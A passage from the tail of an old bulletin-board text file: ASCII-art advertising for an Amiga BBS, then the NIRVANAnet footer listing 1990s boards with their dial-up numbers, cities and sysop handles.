  2850.                ╖.╖       ╖              ╖.               ..╖
  2851.   Us RoBOti╟      ____________   _________  ____________  ____________
  2852.    16.8 Mo╨ems    \___       /  /µ-      \\ \µ-   ___  \\ \µ-    ____/
  2853.                    /µ-|    _/»\/╖    !░   \\/╖     |░   \\/╖       | /\
  2854.                   /╖      ░)  \\     í     \\      |░    \\      ░)»» \\
  2855.                   \____________/____________/______!______/____________/
  2856.  $╟e■tiτ US Hq                                 .
  2857.    __ ___ __ _       . .   _________  ____________  ____________     | ╖
  2858. _ ___|___| __         :   /µ-      \\ \µ-   ___  \\ \µ-    ____/   --╖--
  2859. ___|__ |___|___ _    ╖   //╖   !░   \\/╖     |░   \\/╖       | /\ ╖  |
  2860. _|_  |   |   |          /      í     \\      |░    \\      ░)»» \\  ╖
  2861.  __|»»»»»»»»»»»»»»»|    \_____________/______!______/____________/
  2862. _|_| « Amí Ex■reSS |_ _                 .                  .╖
  2863.   _|_______________|_ ___            ╖.   ___ ___ ___             ___ _
  2864. _ ___|___|___|_______|___|_ ___ ___ ___ _|_ _|_ _|_ _|_ ___ ___ _|__ |__
  2865. ___|___|___|___|___|___|___|_______|___|___|___|___|___|___|___|___|___|
  2866. _|__ |___|___Sysop_Doc Whoo _|__ |___|_Co'S  Flite & Zacke___|__ |___|_
  2867.  __|___ ___|___|___|___ ___|___|___| __|___|___|_TicTac|___|___|___|__
  2868.              __                    __                    __
  2869.   030-25 M╞z \/ 1-209-847-7854 D/s \/ 1-209-847-4889 Hst \/ Amiga Warez
  2870.  
  2871.  
  2872.  
  2873.  
  2874. X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
  2875.  Another file downloaded from:                                NIRVANAnet(tm)
  2876.  
  2877.  &TOTSE                510/935-5845   Walnut Creek, CA         Taipan Enigma
  2878.  Burn This Flag        408/363-9766       San Jose, CA                Zardoz
  2879.  realitycheck          415/666-0339  San Francisco, CA    Poindexter Fortran
  2880.  Governed Anarchy      510/226-6656        Fremont, CA             Eightball
  2881.  New Dork Sublime      805/823-1346      Tehachapi, CA               Biffnix
  2882.  Lies Unlimited        801/278-2699 Salt Lake City, UT            Mick Freen
  2883.  Atomic Books          410/669-4179      Baltimore, MD               Baywolf
  2884.  Sea of Noise          203/886-1441        Norwich, CT             Mr. Noise
  2885.  The Dojo              713/997-6351       Pearland, TX               Yojimbo
  2886.  Frayed Ends of Sanity 503/965-6747     Cloverdale, OR              Flatline
  2887.  The Ether Room        510/228-1146       Martinez, CA Tiny Little Super Guy
  2888.  Hacker Heaven         860/456-9266        Lebanon, CT         The Visionary
  2889.  The Shaven Yak        510/672-6570        Clayton, CA             Magic Man
  2890.  El Observador         408/372-9054        Salinas, CA         El Observador
  2891.  Cool Beans!           415/648-7865  San Francisco, CA        G.A. Ellsworth
  2892.  DUSK Til Dawn         604/746-5383   Cowichan Bay, BC         Cyber Trollis
  2893.  The Great Abyss       510/482-5813        Oakland, CA             Keymaster
  2894.  
  2895.                           "Raw Data for Raw Nerves"
  2896. X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
  2897.